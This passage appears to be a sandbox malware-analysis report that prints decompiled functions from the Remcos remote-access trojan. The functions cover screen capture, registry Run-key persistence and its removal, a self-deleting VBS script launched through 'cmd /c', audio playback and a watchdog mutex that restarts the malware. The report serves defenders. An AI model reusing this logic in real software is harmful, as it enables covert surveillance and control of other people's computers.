Function 0041578F Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 297
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041578F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v16;
				signed int _v36;
				struct _ICONINFO _v128;
				signed int _v146;
				signed int _v148;
				char _v149;
				char _v152;
				long _v156;
				void* _v168;
				struct tagCURSORINFO _v172;
				int _v176;
				signed int _v180;
				signed int _v184;
				int _v196;
				void* _v200;
				void* _v224;
				intOrPtr _v228;
				char _v233;
				char _v236;
				struct HDC__* _v240;
				void* _v242;
				struct HDC__* _v244;
				intOrPtr _v246;
				char _v248;
				intOrPtr _v250;
				signed int _v252;
				char _v256;
				char _v260;
				char _v268;
				struct HDC__* _v272;
				void* _v288;
				void* _v292;
				void* _v304;
				struct HDC__* _v312;
				void* __ebx;
				void* __ebp;
				int _t107;
				void* _t109;
				void* _t113;
				int _t120;
				void* _t121;
				signed char _t133;
				long _t139;
				void* _t140;
				int _t142;
				void* _t150;
				void* _t179;
				void* _t181;
				void* _t187;
				void* _t196;
				void* _t215;
				signed int _t217;
				int _t218;
				void* _t219;
				struct HDC__* _t223;
				struct tagBITMAPINFO* _t225;
				void* _t226;
				int _t232;
				struct HDC__* _t234;

				_t216 = __edx;
				_v149 = __edx;
				_t187 = __ecx;
				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
				_v172.hCursor = _t223;
				_t234 = CreateCompatibleDC(_t223);
				_t218 = E00415BE5( *((intOrPtr*)(0x46dd68 + _v16 * 4)));
				_v156 = _t218;
				_t107 = E00415C2F( *((intOrPtr*)(0x46dd68 + _v16 * 4)));
				_v176 = _t107;
				if(_t218 != 0 || _t107 != 0) {
					_t219 = CreateCompatibleBitmap(_t223, _t218, _t107);
					_v172.hCursor = _t219;
					__eflags = _t219;
					if(_t219 != 0) {
						_t109 = SelectObject(_t234, _t219);
						__eflags = _t109;
						if(_t109 != 0) {
							_t216 =  &_v184;
							_v184 = _v184 & 0x00000000;
							_v180 = _v180 & 0x00000000;
							E00415C70( *((intOrPtr*)(0x46dd68 + _v36 * 4)),  &_v184);
							_t113 = StretchBlt(_t234, 0, 0, _v176, _v196, _t223, _v184, _v180, _v176, _v196, 0xcc0020);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L7;
							}
							__eflags = _v233;
							if(_v233 != 0) {
								_v172.cbSize = 0x14;
								_t179 = GetCursorInfo( &_v172);
								__eflags = _t179;
								if(_t179 != 0) {
									_t181 = GetIconInfo(_v172.hCursor,  &_v128);
									__eflags = _t181;
									if(_t181 != 0) {
										_t232 = _v156 - _v128.yHotspot - _v224;
										__eflags = _t232;
										DeleteObject(_v128.hbmColor);
										DeleteObject(_v128.yHotspot);
										DrawIcon(_t234, _v172.ptScreenPos - _v128.xHotspot - _v228, _t232, _v172);
										_t219 = _v224;
										_t223 = _v240;
									}
								}
							}
							_push( &_v152);
							_t120 = 0x18;
							_t121 = GetObjectA(_t219, _t120, ??);
							__eflags = _t121;
							if(_t121 == 0) {
								goto L7;
							} else {
								_t217 = _v146 * _v148 & 0x0000ffff;
								__eflags = _t217 - 1;
								if(_t217 != 1) {
									_push(4);
									_pop(1);
									_v252 = 1;
									__eflags = _t217 - 1;
									if(_t217 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t225 = LocalAlloc(0x40, ??);
										_t196 = 0x18;
										_t225->bmiHeader = 0x28;
										_t225->bmiHeader.biWidth = _v172.ptScreenPos;
										_t225->bmiHeader.biHeight = _v156;
										_t225->bmiHeader.biPlanes = _v148;
										_t225->bmiHeader.biBitCount = _v146;
										_t133 = _v252;
										__eflags = _t133 - _t196;
										if(_t133 < _t196) {
											__eflags = 1;
											_t225->bmiHeader.biClrUsed = 1 << _t133;
										}
										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t216 = _t217 & 0x00000007;
										_t139 = (_t225->bmiHeader.biWidth + 7 + (_t217 & 0x00000007) >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
										_t225->bmiHeader.biSizeImage = _t139;
										_t140 = GlobalAlloc(0, _t139);
										_v252 = _t140;
										__eflags = _t140;
										if(_t140 != 0) {
											_t142 = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t140, _t225, 0);
											__eflags = _t142;
											if(_t142 != 0) {
												_v252 = 0x4d42;
												_v250 = _t225->bmiHeader + _t225->bmiHeader.biSizeImage + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												_v246 = 0;
												_t150 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t150;
												_v242 = _t150;
												E0040209F(_t187,  &_v236);
												E0040209F(_t187,  &_v148);
												E004024CA(_t187,  &_v236, _t216, __eflags,  &_v252, 0xe);
												L00403336( &_v244);
												E004024CA(_t187,  &_v248, _t216, __eflags, _t225, 0x28);
												L00403336( &_v256);
												_t226 = _v304;
												E004024CA(_t187,  &_v260, _t216, __eflags, _t226, _t225->bmiHeader.biSizeImage);
												L00403336( &_v268);
												DeleteObject(_t219);
												GlobalFree(_t226);
												DeleteDC(_v312);
												DeleteDC(_t234);
												E00402015(_t187, _t187, _t234, __eflags,  &_v196);
												E00401F98();
												E00401F98();
												goto L32;
											}
											DeleteDC(_v272);
											DeleteDC(_t234);
											DeleteObject(_t219);
											GlobalFree(_v292);
											goto L2;
										} else {
											DeleteDC(_v244);
											L8:
											DeleteDC(_t234);
											DeleteObject(_t219);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_v252 = 1;
									__eflags = _t217 - 1;
									if(_t217 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_v252 = 1;
									__eflags = _t217 - 1;
									if(_t217 <= 1) {
										goto L24;
									}
									_t215 = 0x18;
									__eflags = _t217 - _t215;
									if(_t217 > _t215) {
										_push(0x20);
										_pop(1);
										L23:
										_v252 = 1;
										goto L24;
									}
									_v252 = _t215;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						DeleteDC(_t223);
						goto L8;
					} else {
						DeleteDC(_t223);
						DeleteDC(_t234);
						DeleteObject(_t219);
						L5:
						goto L2;
					}
				} else {
					L2:
					E00402053(_t187, _t187, _t216, _t234, 0x461084);
					L32:
					return _t187;
				}
			}

0x0041578f
0x0041579b
0x004157a7
0x004157af
0x004157b2
0x004157c3
0x004157d1
0x004157da
0x004157e5
0x004157ea
0x004157f0
0x00415810
0x00415812
0x00415816
0x00415818
0x00415831
0x00415837
0x00415839
0x00415851
0x00415855
0x0041585a
0x00415866
0x0041588a
0x00415890
0x00415892
0x00000000
0x00000000
0x00415894
0x00415899
0x0041589f
0x004158a8
0x004158ae
0x004158b0
0x004158be
0x004158c4
0x004158c6
0x004158e9
0x004158e9
0x004158ed
0x004158fa
0x00415907
0x0041590d
0x00415911
0x00415911
0x004158c6
0x004158b0
0x00415919
0x0041591c
0x0041591f
0x00415925
0x00415927
0x00000000
0x0041592d
0x00415936
0x0041593c
0x0041593f
0x00415945
0x00415947
0x00415948
0x0041594c
0x0041594f
0x00415980
0x00415980
0x00415989
0x0041598a
0x00415992
0x00415996
0x00415997
0x004159a1
0x004159a8
0x004159b0
0x004159b9
0x004159bd
0x004159c1
0x004159c4
0x004159cb
0x004159cd
0x004159cd
0x004159da
0x004159de
0x004159e2
0x004159e3
0x004159f1
0x004159f8
0x004159fb
0x00415a01
0x00415a05
0x00415a07
0x00415a1f
0x00415a25
0x00415a27
0x00415a54
0x00415a69
0x00415a6f
0x00415a7b
0x00415a7b
0x00415a82
0x00415a86
0x00415a92
0x00415aa2
0x00415ab3
0x00415abf
0x00415ad0
0x00415ad8
0x00415ae1
0x00415af2
0x00415af8
0x00415aff
0x00415b0f
0x00415b12
0x00415b1e
0x00415b2a
0x00415b33
0x00000000
0x00415b33
0x00415a33
0x00415a36
0x00415a39
0x00415a44
0x00000000
0x00415a09
0x00415842
0x0041583c
0x00415845
0x00415827
0x00000000
0x00415827
0x00415a07
0x00415951
0x00415953
0x00415954
0x00415958
0x0041595b
0x00000000
0x00000000
0x0041595d
0x0041595f
0x00415960
0x00415964
0x00415967
0x00000000
0x00000000
0x0041596b
0x0041596c
0x0041596f
0x00415979
0x0041597b
0x0041597c
0x0041597c
0x00000000
0x0041597c
0x00415971
0x00415975
0x00000000
0x00415975
0x00000000
0x00415941
0x00415927
0x0041583b
0x00415842
0x00000000
0x0041581a
0x00415821
0x00415824
0x00415827
0x00415827
0x00000000
0x00415827
0x004157f6
0x004157f6
0x004157fd
0x00415b3b
0x00415b44
0x00415b44

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
CreateCompatibleDC.GDI32(00000000), ref: 004157B6

Part of subcall function 00415BE5: GetMonitorInfoW.USER32(?,?), ref: 00415C05

Part of subcall function 00415C2F: GetMonitorInfoW.USER32(?,?), ref: 00415C4F

CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 0041580A
DeleteDC.GDI32(00000000), ref: 00415821
DeleteDC.GDI32(00000000), ref: 00415824
DeleteObject.GDI32(00000000), ref: 00415827
SelectObject.GDI32(00000000,00000000), ref: 00415831
DeleteDC.GDI32(00000000), ref: 00415842
DeleteDC.GDI32(00000000), ref: 00415845
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0041588A
GetCursorInfo.USER32(?), ref: 004158A8
GetIconInfo.USER32(?,?), ref: 004158BE
DeleteObject.GDI32(?), ref: 004158ED
DeleteObject.GDI32(?), ref: 004158FA
DrawIcon.USER32 ref: 00415907
GetObjectA.GDI32(00000000,00000018,?), ref: 0041591F
LocalAlloc.KERNEL32(00000040,00000001), ref: 0041598C
GlobalAlloc.KERNEL32(00000000,?), ref: 004159FB
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00415A1F
DeleteDC.GDI32(?), ref: 00415A33
DeleteDC.GDI32(00000000), ref: 00415A36
DeleteObject.GDI32(00000000), ref: 00415A39
GlobalFree.KERNEL32 ref: 00415A44
DeleteObject.GDI32(00000000), ref: 00415AF8
GlobalFree.KERNEL32 ref: 00415AFF
DeleteDC.GDI32(?), ref: 00415B0F
DeleteDC.GDI32(00000000), ref: 00415B12

Strings

DISPLAY, xrefs: 004157A2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY
API String ID: 517350757-865373369
Opcode ID: 03c8cb86559e5b9e8e0ee65dbb47f0ea93f3a5bd1830207cf3364575eb27ddeb
Instruction ID: c91569fff03eade9eee0c78440e7041a36cc381d21532e3a74c7778e484bb87e
Opcode Fuzzy Hash: 03c8cb86559e5b9e8e0ee65dbb47f0ea93f3a5bd1830207cf3364575eb27ddeb
Instruction Fuzzy Hash: 49B15D71508705DFC320EF61D844BABBBE8EB84715F10482EFA8997291DB34E944CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B256 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 281
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B256(void* __edx, void* _a4) {
				char _v0;
				short _v524;
				char _v548;
				void* _v560;
				char _v576;
				void* _v584;
				char _v596;
				char _v600;
				char _v612;
				char _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v644;
				char _v648;
				char _v652;
				void* _v656;
				char _v668;
				char _v672;
				char _v676;
				void* _v680;
				char _v692;
				void* _v696;
				char _v700;
				char _v704;
				char _v708;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t67;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t213;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t248;

				_t213 = __edx;
				E0041030A();
				if( *0x46c9c4 != 0x30) {
					E00409F34();
				}
				_t244 =  *0x46dd5b - 1; // 0x0
				if(_t244 == 0) {
					E0041628E(_t213, _t244);
				}
				if( *0x46da75 != 0) {
					E004187B1(E00401EC4(0x46e0d8), _t213);
				}
				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t246 =  *0x46daf7 - 1; // 0x1
				if(_t246 == 0) {
					E00410F97(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EC4(0x46e570));
				}
				_t247 =  *0x46daf4 - 1; // 0x0
				if(_t247 == 0) {
					E00410F97(0x80000002, _t230, E00401EC4(0x46e570));
				}
				_t248 =  *0x46daf5 - 1; // 0x0
				if(_t248 == 0) {
					E00410F97(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EC4(0x46e570));
				}
				_t53 = E0040243C();
				_t54 = E00401F6B(0x46e5e8);
				_t57 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v524, 0x208, _t54, _t53);
				_t249 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F6B(0x46e5a0));
				_t61 = SetFileAttributesW( &_v524, 0x80);
				_t140 = 0x46e5b8;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004078C9(_t249);
				_t250 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46e5b8;
					SetFileAttributesW(E00401EC4(0x46e5b8), 0x80);
				}
				E00402FD4(_t134,  &_v600, E0040413E(_t134,  &_v668, 0x4610ec, 0x4610ec, E00438A0F(_t134, _t140, _t250, L"Temp")), 0, 0x4610ec, _t250, L"\\update.vbs");
				E00401EC9();
				_t67 = E0040413E(_t134,  &_v672, _t64, 0x4610ec, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t217 = L"On Error Resume Next\n";
				E004042BC(_t134,  &_v700, L"On Error Resume Next\n", 0x4610ec, _t250, _t67);
				E00401EC9();
				_t251 = _t134;
				if(_t134 != 0) {
					_t217 = E004042BC(_t134,  &_v648, L"while fso.FileExists(\"", 0x4610ec, _t251, E0040413E(_t134,  &_v620, L"On Error Resume Next\n", 0x4610ec,  &_v524));
					E0040321D(E00402FD4(_t134,  &_v672, _t109, 0, 0x4610ec, _t251, L"\")\n"));
					E00401EC9();
					E00401EC9();
					E00401EC9();
				}
				_t236 = L"\"\n";
				E0040321D(E00402FD4(_t134,  &_v624, E00402FD4(_t134,  &_v648, E0040413E(_t134,  &_v668, _t217, 0x4610ec, L"fso.DeleteFile \""), 0, 0x4610ec, _t251,  &_v524), 0, 0x4610ec, _t251, L"\"\n"));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				_t252 = _t134;
				if(_t134 != 0) {
					L00407735(_t134,  &_v692, 0, 0x4610ec, L"wend\n");
				}
				_t220 = 0x4610ec;
				_t78 = E004078C9(_t252);
				_t253 = _t78;
				if(_t78 != 0) {
					_t220 = E0040A01F( &_v644, L"fso.DeleteFolder \"", 0x4610ec, 0x46e5b8);
					E0040321D(E00402FD4(0x46e5b8,  &_v620, _t101, 0, 0x4610ec, _t253, _t236));
					E00401EC9();
					E00401EC9();
				}
				_t79 = E0040413E(0x46e5b8,  &_v548, _t220, 0x4610ec, L"\"\"\", 0");
				E0040321D(E00402FD4(0x46e5b8,  &_v628, E00402F65( &_v652, E004042DD(0x46e5b8,  &_v676, E0040413E(0x46e5b8,  &_v576, _t220, 0x4610ec, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x4610ec, _t253,  &_v0), _t79), 0, 0x4610ec, _t253, "\n"));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				L00407735(0x46e5b8,  &_v704, 0, 0x4610ec, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00401EC4( &_v612);
				_t93 = E0040243C();
				E00401EC4( &_v708);
				if(E00418911(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EC4( &_v596), 0x4610ec, 0x4610ec, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EC9();
				E00401EC9();
				return E00401EC9();
			}

0x0040b256
0x0040b260
0x0040b26c
0x0040b26e
0x0040b26e
0x0040b276
0x0040b27c
0x0040b27e
0x0040b27e
0x0040b28a
0x0040b298
0x0040b298
0x0040b2a2
0x0040b2a7
0x0040b2ad
0x0040b2be
0x0040b2c3
0x0040b2c9
0x0040b2cf
0x0040b2dd
0x0040b2e2
0x0040b2e3
0x0040b2e9
0x0040b2fa
0x0040b2ff
0x0040b307
0x0040b30f
0x0040b336
0x0040b340
0x0040b342
0x0040b34e
0x0040b34e
0x0040b361
0x0040b37a
0x0040b387
0x0040b38c
0x0040b38e
0x0040b391
0x0040b396
0x0040b398
0x0040b39f
0x0040b3aa
0x0040b3aa
0x0040b3cc
0x0040b3d6
0x0040b3e4
0x0040b3ea
0x0040b3f3
0x0040b3fd
0x0040b402
0x0040b404
0x0040b42c
0x0040b43d
0x0040b446
0x0040b44f
0x0040b458
0x0040b458
0x0040b45d
0x0040b496
0x0040b49f
0x0040b4a8
0x0040b4b1
0x0040b4b6
0x0040b4b8
0x0040b4c3
0x0040b4c3
0x0040b4cd
0x0040b4d1
0x0040b4d6
0x0040b4d8
0x0040b4eb
0x0040b4fc
0x0040b505
0x0040b50e
0x0040b50e
0x0040b524
0x0040b56c
0x0040b575
0x0040b57e
0x0040b587
0x0040b593
0x0040b59f
0x0040b5ad
0x0040b5b7
0x0040b5c1
0x0040b5ce
0x0040b5e0
0x0040b601
0x0040b601
0x0040b60b
0x0040b614
0x0040b62f

APIs

Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B34E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B361
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B37A
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B3AA

Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A37,00000000,0046E588,0040AEEE,?,0046E5A0,pth_unenc,0046E588), ref: 00409F43
Part of subcall function 00409F34: UnhookWindowsHookEx.USER32(0025013B), ref: 00409F53
Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A21,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00409F65

Part of subcall function 00418911: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,00418A34,00000000,00000000,00000000), ref: 00418950

ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B5F5
ExitProcess.KERNEL32 ref: 0040B601

Strings

fso.DeleteFolder ", xrefs: 0040B4DC
open, xrefs: 0040B5EF
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B532
\update.vbs, xrefs: 0040B3AC
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B5A4
while fso.FileExists(", xrefs: 0040B41D
"), xrefs: 0040B406
""", 0, xrefs: 0040B518
On Error Resume Next, xrefs: 0040B3EA
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B2F3
wend, xrefs: 0040B4BA
Temp, xrefs: 0040B3B1
fso.DeleteFile ", xrefs: 0040B46B
Remcos, xrefs: 0040B29D
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B2A2
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B3DB
exepath, xrefs: 0040B328

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: 14a662654b977d7ec31285f1b04a17553a86ffabf4cdfa494283df12be9bb35b
Instruction ID: 871c8e1d6bde0fadc417a5a0982cbad285edf7ac094e03f293d7e5e2671dfa19
Opcode Fuzzy Hash: 14a662654b977d7ec31285f1b04a17553a86ffabf4cdfa494283df12be9bb35b
Instruction Fuzzy Hash: 5591AF716182405AC318F762DC62AAF77E89F90309F54043FF446A31E2EE7C9D4AC69E

Uniqueness

Uniqueness Score: -1.00%

Function 004178D4 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004178D4(void* __ecx, void* __edx, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* _v128;
				char _v176;
				char _v192;
				void* _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t26;
				void* _t41;
				long _t45;
				void* _t59;
				void* _t62;
				void* _t66;
				void* _t109;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t120;

				_t103 = __edx;
				_t116 =  &_v124;
				_t66 = __ecx;
				_t109 = __edx;
				if(E00417B37( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t62 = E00401EC4( &_a4);
					_t103 = 0x30;
					E00401ED3( &_a4, 0x30, _t111, E0041905E( &_v124, 0x30, _t62));
					E00401EC9();
				}
				_t23 = E0040243C();
				_t122 = _t23;
				if(_t23 == 0) {
					__eflags = PathFileExistsW(E00401EC4( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402053(_t66, _t116 - 0x18, _t103, _t114, 0x461084);
						_push(0xa8);
						E00404A78(0x46ec30, _t103, __eflags);
					}
				} else {
					_t59 = E00401EC4( &_a4);
					_t120 = _t116 - 0x18;
					E004020B6(_t66, _t120, _t103, _t122, _t109);
					E00418A12(_t59);
					_t116 = _t120 + 0x18;
					L4:
					_t26 = E00418385( &_v28, _t66);
					_t108 = E00402F65( &_v124, E00402FD4(_t66,  &_v76, E0040A01F( &_v52, L"open \"", _t114,  &_a4), _t109, _t114, _t122, L"\" type "), _t26);
					E00402FD4(_t66,  &_v100, _t30, _t109, _t114, _t122, L" alias audio");
					E00401EC9();
					E00401EC9();
					E00401EC9();
					E00401EC9();
					mciSendStringW(E00401EC4( &_v100), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t117 = _t116 - 0x18;
					E00402053(0, _t116 - 0x18, _t30, _t114, 0x461084);
					_push(0xa9);
					E00404A78(0x46ec30, _t30, 0);
					_t41 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46de9c = _t41;
						while(1) {
							_t124 = _t41;
							if(_t41 == 0) {
								break;
							}
							__eflags =  *0x46de9a; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46de9a = 0;
							}
							__eflags =  *0x46de99; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46de99 = 0;
							}
							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
							_t45 = E00438EB0( &_v192, "stopped");
							__eflags = _t45;
							if(_t45 == 0) {
								SetEvent( *0x46de9c);
							}
							__eflags = WaitForSingleObject( *0x46de9c, 0x1f4);
							if(__eflags != 0) {
								_t41 =  *0x46de9c; // 0x0
							} else {
								CloseHandle( *0x46de9c);
								_t41 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402053(0, _t117 - 0x18, _t108, 0x46ec30, 0x461084);
						_push(0xaa);
						E00404A78(0x46ec30, _t108, _t124);
						E00401EC9();
						goto L19;
					}
				}
				L19:
				return E00401EC9();
			}

0x004178d4
0x004178d4
0x004178dc
0x004178de
0x004178f0
0x004178f9
0x004178ff
0x00417913
0x0041791c
0x0041791c
0x00417923
0x0041792f
0x00417931
0x00417a2f
0x00417a31
0x00000000
0x00417a37
0x00417a41
0x00417a46
0x00417a50
0x00417a50
0x00417937
0x00417937
0x0041793c
0x00417944
0x0041794b
0x00417950
0x00417953
0x0041795e
0x00417998
0x0041799e
0x004179a8
0x004179b1
0x004179ba
0x004179c3
0x004179d7
0x004179eb
0x004179ed
0x004179f8
0x00417a02
0x00417a09
0x00417a13
0x00417a19
0x00417a19
0x00417a19
0x00417ae7
0x00417ae7
0x00417ae9
0x00000000
0x00000000
0x00417a5a
0x00417a60
0x00417a6a
0x00417a6c
0x00417a6c
0x00417a72
0x00417a78
0x00417a82
0x00417a84
0x00417a84
0x00417a97
0x00417aa3
0x00417aaa
0x00417aac
0x00417ab4
0x00417ab4
0x00417acb
0x00417acd
0x00417ae2
0x00417acf
0x00417ad5
0x00417adb
0x00000000
0x00417adb
0x00417acd
0x00417af7
0x00417b01
0x00417b09
0x00417b0e
0x00417b15
0x00417b1e
0x00000000
0x00417b1e
0x00417a19
0x00417b23
0x00417b36

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004179D7
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004179EB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00461084), ref: 00417A13
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,0046E260,00000000), ref: 00417A29
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00417A6A
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00417A82
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00417A97
SetEvent.KERNEL32 ref: 00417AB4
WaitForSingleObject.KERNEL32(000001F4), ref: 00417AC5
CloseHandle.KERNEL32 ref: 00417AD5
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00417AF7
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00417B01

Strings

stopped, xrefs: 00417A9D
resume audio, xrefs: 00417A7D
" type , xrefs: 00417970
stop audio, xrefs: 00417AF2
open ", xrefs: 0041796B
status audio mode, xrefs: 00417A92
`F, xrefs: 00417918
pause audio, xrefs: 00417A65
close audio, xrefs: 00417AFC
play audio, xrefs: 004179E6
alias audio, xrefs: 00417953

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $`F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-4026724951
Opcode ID: 347a97de2a33badba23eb7f922f2683029b76ac921bbc2536f08d17a06bb18f9
Instruction ID: 8692a01f65d0cc53f57fd209159479e10e637190834e875ef2e68fc076a3909c
Opcode Fuzzy Hash: 347a97de2a33badba23eb7f922f2683029b76ac921bbc2536f08d17a06bb18f9
Instruction Fuzzy Hash: 4D51D1717182046ED214B732EC96EAF3BAC9B9038DF10043FF506661E2EE794D49866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF45 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FF45() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E0040243C();
				_t28 = E00401F6B(0x46e5e8);
				_t108 = 0x46e5a0;
				_t31 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E0040209F(0,  &_v32);
					if(E004189A5( &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "WDH", _t37) == 0) {
						L18:
						ExitProcess(1);
						L2:
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410AC0(E00401F6B(0x46e5a0), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
